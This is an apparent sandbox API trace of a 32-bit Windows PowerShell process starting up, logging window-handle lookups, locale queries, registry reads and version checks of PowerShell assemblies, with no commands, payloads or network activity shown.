	[0201.983] GetLastError () returned 0x0
	[0201.984] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x7b0
	[0201.984] GetLastError () returned 0x0
	[0201.984] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x6a4
	[0201.984] GetLastError () returned 0x0
	[0201.984] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x32c
	[0201.984] GetLastError () returned 0x0
	[0201.984] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x670
	[0201.984] GetLastError () returned 0x0
	[0201.984] GetWindowThreadProcessId (in: hWnd=0x10138, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x50c
	[0201.984] GetLastError () returned 0x0
	[0201.984] GetWindowThreadProcessId (in: hWnd=0x10130, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x514
	[0201.984] GetLastError () returned 0x0
	[0201.984] GetWindowThreadProcessId (in: hWnd=0x10126, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x4f0
	[0201.984] GetLastError () returned 0x0
	[0201.985] GetWindowThreadProcessId (in: hWnd=0x10110, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x58c
	[0201.985] GetLastError () returned 0x0
	[0201.985] GetWindowThreadProcessId (in: hWnd=0x1010a, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x458
	[0201.985] GetLastError () returned 0x0
	[0201.985] GetWindowThreadProcessId (in: hWnd=0x10086, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x4f4
	[0201.985] GetLastError () returned 0x0
	[0201.985] GetWindowThreadProcessId (in: hWnd=0x2002a, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x794
	[0201.985] GetLastError () returned 0x0
	[0201.985] GetWindowThreadProcessId (in: hWnd=0x10048, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x458
	[0201.985] GetLastError () returned 0x0
	[0201.986] GetWindowThreadProcessId (in: hWnd=0x2001a, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x778
	[0201.986] GetLastError () returned 0x0
	[0201.986] GetLastError () returned 0x0
	[0201.989] WerSetFlags () returned 0x0
	[0201.997] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0202.000] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x10ef5c, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x10ef58 | out: pulNumLanguages=0x10ef5c, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x10ef58) returned 1
	[0202.000] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x10ef5c, pwszLanguagesBuffer=0x297861c, pcchLanguagesBuffer=0x10ef58 | out: pulNumLanguages=0x10ef5c, pwszLanguagesBuffer=0x297861c, pcchLanguagesBuffer=0x10ef58) returned 1
	[0202.005] GetUserDefaultLocaleName (in: lpLocaleName=0x5090b0, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0202.220] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5090b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0202.220] GetLastError () returned 0xcb
	[0202.223] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5090b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0202.223] GetLastError () returned 0xcb
	[0202.226] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5090b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0202.226] GetLastError () returned 0xcb
	[0202.238] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e9cc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0202.238] GetLastError () returned 0xcb
	[0202.238] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e9e8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0202.238] GetLastError () returned 0xcb
	[0202.238] SetErrorMode (uMode=0x1) returned 0x1
	[0202.238] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x10ee68 | out: lpFileInformation=0x10ee68*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0202.239] GetLastError () returned 0xcb
	[0202.239] SetErrorMode (uMode=0x1) returned 0x1
	[0202.239] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x10eeec | out: lpdwHandle=0x10eeec) returned 0x94c
	[0202.240] GetLastError () returned 0x0
	[0202.240] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x297ab4c | out: lpData=0x297ab4c) returned 1
	[0202.241] VerQueryValueW (in: pBlock=0x297ab4c, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x10eeb8, puLen=0x10eeb4 | out: lplpBuffer=0x10eeb8*=0x297abe8, puLen=0x10eeb4) returned 1
	[0202.241] VerQueryValueW (in: pBlock=0x297ab4c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x10ee34, puLen=0x10ee30 | out: lplpBuffer=0x10ee34*=0x297acc4, puLen=0x10ee30) returned 1
	[0202.241] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0202.241] lstrcpyW (in: lpString1=0x5090b0, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0202.241] VerQueryValueW (in: pBlock=0x297ab4c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x10ee34, puLen=0x10ee30 | out: lplpBuffer=0x10ee34*=0x297ad18, puLen=0x10ee30) returned 1
	[0202.241] lstrlenW (lpString="System.Management.Automation") returned 28
	[0202.241] lstrcpyW (in: lpString1=0x5090b0, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0202.241] VerQueryValueW (in: pBlock=0x297ab4c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x10ee34, puLen=0x10ee30 | out: lplpBuffer=0x10ee34*=0x297ad74, puLen=0x10ee30) returned 1
	[0202.241] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0202.241] lstrcpyW (in: lpString1=0x5090b0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0202.242] VerQueryValueW (in: pBlock=0x297ab4c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x10ee34, puLen=0x10ee30 | out: lplpBuffer=0x10ee34*=0x297adb4, puLen=0x10ee30) returned 1
	[0202.242] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0202.242] lstrcpyW (in: lpString1=0x5090b0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0202.242] VerQueryValueW (in: pBlock=0x297ab4c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x10ee34, puLen=0x10ee30 | out: lplpBuffer=0x10ee34*=0x297ae1c, puLen=0x10ee30) returned 1
	[0202.242] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0202.242] lstrcpyW (in: lpString1=0x5090b0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0202.242] VerQueryValueW (in: pBlock=0x297ab4c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x10ee34, puLen=0x10ee30 | out: lplpBuffer=0x10ee34*=0x297aeb8, puLen=0x10ee30) returned 1
	[0202.242] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0202.242] lstrcpyW (in: lpString1=0x5090b0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0202.242] VerQueryValueW (in: pBlock=0x297ab4c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x10ee34, puLen=0x10ee30 | out: lplpBuffer=0x10ee34*=0x297af1c, puLen=0x10ee30) returned 1
	[0202.242] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0202.242] lstrcpyW (in: lpString1=0x5090b0, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0202.243] VerQueryValueW (in: pBlock=0x297ab4c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x10ee34, puLen=0x10ee30 | out: lplpBuffer=0x10ee34*=0x297af98, puLen=0x10ee30) returned 1
	[0202.243] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0202.243] lstrcpyW (in: lpString1=0x5090b0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0202.243] VerQueryValueW (in: pBlock=0x297ab4c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x10ee34, puLen=0x10ee30 | out: lplpBuffer=0x10ee34*=0x297ac40, puLen=0x10ee30) returned 1
	[0202.243] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0202.243] lstrcpyW (in: lpString1=0x5090b0, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0202.243] VerQueryValueW (in: pBlock=0x297ab4c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x10ee34, puLen=0x10ee30 | out: lplpBuffer=0x10ee34*=0x0, puLen=0x10ee30) returned 0
	[0202.243] VerQueryValueW (in: pBlock=0x297ab4c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x10ee34, puLen=0x10ee30 | out: lplpBuffer=0x10ee34*=0x0, puLen=0x10ee30) returned 0
	[0202.243] VerQueryValueW (in: pBlock=0x297ab4c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x10ee34, puLen=0x10ee30 | out: lplpBuffer=0x10ee34*=0x0, puLen=0x10ee30) returned 0
	[0202.243] VerQueryValueW (in: pBlock=0x297ab4c, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x10ee28, puLen=0x10ee24 | out: lplpBuffer=0x10ee28*=0x297abe8, puLen=0x10ee24) returned 1
	[0202.243] VerLanguageNameW (in: wLang=0x0, szLang=0x5090b0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0202.243] VerQueryValueW (in: pBlock=0x297ab4c, lpSubBlock="\\", lplpBuffer=0x10ee3c, puLen=0x10ee38 | out: lplpBuffer=0x10ee3c*=0x297ab74, puLen=0x10ee38) returned 1
	[0202.253] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5090b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0202.253] GetLastError () returned 0xcb
	[0202.415] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5090b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0202.415] GetLastError () returned 0xcb
	[0202.421] lstrlenW (lpString="䅁") returned 1
	[0202.426] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10ee00 | out: phkResult=0x10ee00*=0x334) returned 0x0
	[0202.426] RegOpenKeyExW (in: hKey=0x334, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0x10ee04 | out: phkResult=0x10ee04*=0x338) returned 0x0
	[0202.426] RegOpenKeyExW (in: hKey=0x338, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x10ee38 | out: phkResult=0x10ee38*=0x33c) returned 0x0
	[0202.428] RegQueryValueExW (in: hKey=0x33c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10ee78, lpData=0x0, lpcbData=0x10ee74*=0x0 | out: lpType=0x10ee78*=0x1, lpData=0x0, lpcbData=0x10ee74*=0x56) returned 0x0
	[0202.430] RegQueryValueExW (in: hKey=0x33c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10ee78, lpData=0x5090b0, lpcbData=0x10ee74*=0x56 | out: lpType=0x10ee78*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x10ee74*=0x56) returned 0x0
	[0202.435] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0202.435] GetLastError () returned 0x0
	[0202.438] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0202.438] GetLastError () returned 0x0
	[0202.525] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0202.525] GetLastError () returned 0x0
	[0202.540] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5090b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0202.540] GetLastError () returned 0xcb
	[0203.773] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x10e940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0203.773] GetLastError () returned 0x2
	[0203.773] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x10e940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0203.773] GetLastError () returned 0x2
	[0204.218] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5090b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0204.218] GetLastError () returned 0xcb
	[0204.220] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5090b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0204.220] GetLastError () returned 0xcb
	[0204.372] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5090b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0204.372] GetLastError () returned 0xcb
	[0204.374] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5090b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0204.374] GetLastError () returned 0xcb
	[0204.374] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5090b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0204.374] GetLastError () returned 0xcb
	[0205.058] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x10e940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0205.058] GetLastError () returned 0x0
	[0205.058] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x10e940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0205.058] GetLastError () returned 0x0
	[0206.953] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5090b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0206.953] GetLastError () returned 0xcb
	[0206.955] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5090b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0206.955] GetLastError () returned 0xcb
	[0207.135] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0207.135] GetLastError () returned 0x7e
	[0207.135] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0207.135] GetLastError () returned 0x7e
	[0209.668] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x10e940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0209.668] GetLastError () returned 0x2
	[0209.668] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x10e940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0209.668] GetLastError () returned 0x2
	[0210.940] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10e940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0210.940] GetLastError () returned 0x57
	[0210.940] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10e940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0210.940] GetLastError () returned 0x57
	[0211.906] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x10e940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0211.906] GetLastError () returned 0x2
	[0211.906] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x10e940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0211.906] GetLastError () returned 0x2
	[0214.397] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x10e940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0214.397] GetLastError () returned 0x2
	[0214.397] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x10e940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0214.397] GetLastError () returned 0x2
	[0214.799] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5090b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0214.799] GetLastError () returned 0xcb
	[0214.801] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10ea08, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0214.801] GetLastError () returned 0xcb
	[0214.801] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10e9b8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0214.801] GetLastError () returned 0xcb
	[0214.801] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10e9b8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0214.801] GetLastError () returned 0xcb
	[0214.813] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10e9b8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0214.813] GetLastError () returned 0xcb
	[0215.205] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x10e94c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0215.205] GetLastError () returned 0x2
	[0215.205] SetErrorMode (uMode=0x1) returned 0x1
	[0215.205] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x10edf4 | out: lpFileInformation=0x10edf4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0215.205] GetLastError () returned 0x2
	[0215.205] SetErrorMode (uMode=0x1) returned 0x1
	[0220.519] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10ea08, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0220.519] GetLastError () returned 0x0
